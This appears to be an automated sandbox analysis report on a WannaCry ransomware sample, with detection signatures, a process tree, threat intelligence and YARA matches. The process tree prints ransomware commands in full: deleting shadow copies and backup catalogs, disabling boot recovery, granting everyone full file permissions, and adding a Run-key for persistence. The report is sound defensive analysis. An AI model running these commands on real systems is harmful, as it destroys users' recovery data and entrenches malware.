Edit tour

Windows Analysis Report
Wannacry.exe

Overview

General Information

Sample Name:	Wannacry.exe
Analysis ID:	1292085
MD5:	84c82835a5d21bbcf75a61706d8ab549
SHA1:	5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256:	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
Infos:

Detection

Wannacry, Conti

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Wannacry ransomware

Antivirus detection for dropped file

Yara detected Conti ransomware

Multi AV Scanner detection for submitted file

Detected Wannacry Ransomware

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Sigma detected: Delete shadow copy via WMIC

Multi AV Scanner detection for dropped file

Installs TOR (Internet Anonymizer)

Creates files in the recycle bin to hide itself

Found Tor onion address

Uses bcdedit to modify the Windows boot settings

Machine Learning detection for sample

Drops PE files to the document folder of the user

Modifies existing user documents (likely ransomware behavior)

Writes many files with high entropy

Contains functionalty to change the wallpaper

Command shell drops VBS files

Contains functionality to modify clipboard data

Machine Learning detection for dropped file

May use the Tor software to hide its network traffic

Deletes shadow drive data (may be related to ransomware)

Contains functionality to detect sleep reduction / modifications

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Uses reg.exe to modify the Windows registry

PE file contains more sections than normal

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

PE file contains sections with non-standard names

Found potential string decryption / allocating functions

Found dropped PE file which has not been started or loaded

PE file contains executable resources (Code or Archives)

Sample file is different than original file name gathered from version info

Uses cacls to modify the permissions of files

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Found evaded block containing many API calls

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64native

Wannacry.exe (PID: 2584 cmdline: C:\Users\user\Desktop\Wannacry.exe MD5: 84C82835A5D21BBCF75A61706D8AB549)

attrib.exe (PID: 3344 cmdline: attrib +h . MD5: 0E938DD280E83B1596EC6AA48729C2B0)

conhost.exe (PID: 3580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

icacls.exe (PID: 3480 cmdline: icacls . /grant Everyone:F /T /C /Q MD5: 2E49585E4E08565F52090B144062F97E)

conhost.exe (PID: 3508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

taskdl.exe (PID: 5472 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

cmd.exe (PID: 5988 cmdline: C:\Windows\system32\cmd.exe /c 312151692193723.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cscript.exe (PID: 1584 cmdline: cscript.exe //nologo m.vbs MD5: 13783FF4A2B614D7FBD58F5EEBDEDEF6)

dllhost.exe (PID: 712 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

taskdl.exe (PID: 4160 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 5276 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6672 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

@WanaDecryptor@.exe (PID: 8616 cmdline: @WanaDecryptor@.exe co MD5: 7BF2B57F2A205768755C07F238FB32CC)

taskhsvc.exe (PID: 3644 cmdline: TaskData\Tor\taskhsvc.exe MD5: FE7EB54691AD6E6AF77F8A9A0B6DE26D)

conhost.exe (PID: 1620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 8696 cmdline: cmd.exe /c start /b @WanaDecryptor@.exe vs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

@WanaDecryptor@.exe (PID: 8904 cmdline: @WanaDecryptor@.exe vs MD5: 7BF2B57F2A205768755C07F238FB32CC)

cmd.exe (PID: 9004 cmdline: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

WMIC.exe (PID: 9024 cmdline: wmic shadowcopy delete MD5: 82BB8430531876FBF5266E53460A393E)

taskse.exe (PID: 9112 cmdline: taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)

@WanaDecryptor@.exe (PID: 8068 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)

cmd.exe (PID: 9164 cmdline: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "uqcbeegnpjpsq661" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

reg.exe (PID: 2948 cmdline: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "uqcbeegnpjpsq661" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

taskdl.exe (PID: 3328 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskse.exe (PID: 5080 cmdline: taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)

@WanaDecryptor@.exe (PID: 5580 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)

taskdl.exe (PID: 4672 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
WannaCryptor, WannaCry, WannaCrypt		Lazarus Group	http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/ http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d	https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor

Name	Description	Attribution	Blogpost URLs	Link
Conti, Conti Lock	Conti is an extremely damaging ransomware due to the speed with which it encrypts data and spreads to other systems. It was first observed in 2020 and it is thought to be led by a Russia-based cybercrime group that goes under the Wizard Spider pseudonym. In early May 2022, the US government announced a reward of up to $10 million for information on the Conti ransomware gang.	No Attribution	http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/ https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74 https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/	https://malpedia.caad.fkie.fraunhofer.de/details/win.conti

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Wannacry.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Wannacry.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
Wannacry.exe	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Wannacry.exe	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0x342d41:$x2: taskdl.exe 0x35962d:$x2: taskdl.exe 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0x359d91:$s2: Windows 10 --> 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x3591ff:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1

Dropped Files

Source	Rule	Description	Author	Strings
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x27c:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\u.wnry	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@WanaDecryptor@.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\@WanaDecryptor@.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@WanaDecryptor@.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\@WanaDecryptor@.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@WanaDecryptor@.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\@WanaDecryptor@.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\@WanaDecryptor@.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\@WanaDecryptor@.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@WanaDecryptor@.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\@WanaDecryptor@.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\@WanaDecryptor@.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\@WanaDecryptor@.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@WanaDecryptor@.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\@WanaDecryptor@.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\@WanaDecryptor@.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\@WanaDecryptor@.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
Click to see the 39 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0000001E.00000000.2017719338.000000000041F000.00000008.00000001.01000000.00000008.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0000001B.00000000.2015355782.000000000041F000.00000008.00000001.01000000.00000008.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000021.00000002.5854720396.000000000041F000.00000008.00000001.01000000.00000008.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000003.848497025.00000000007CA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000021.00000000.2040530880.000000000041F000.00000008.00000001.01000000.00000008.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0000002F.00000002.2348326263.000000000041F000.00000008.00000001.01000000.00000008.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000003.2011922304.0000000000802000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000003.1362189646.00000000007F7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0000002F.00000000.2346390626.000000000041F000.00000008.00000001.01000000.00000008.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000000.813793076.000000000040E000.00000008.00000001.01000000.00000003.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000000.00000003.2010730954.0000000000801000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: Wannacry.exe PID: 2584	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: @WanaDecryptor@.exe PID: 8616	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: @WanaDecryptor@.exe PID: 8616	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
Process Memory Space: @WanaDecryptor@.exe PID: 8904	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: @WanaDecryptor@.exe PID: 8068	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: @WanaDecryptor@.exe PID: 5580	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
47.0.@WanaDecryptor@.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
47.0.@WanaDecryptor@.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
33.2.@WanaDecryptor@.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
33.2.@WanaDecryptor@.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
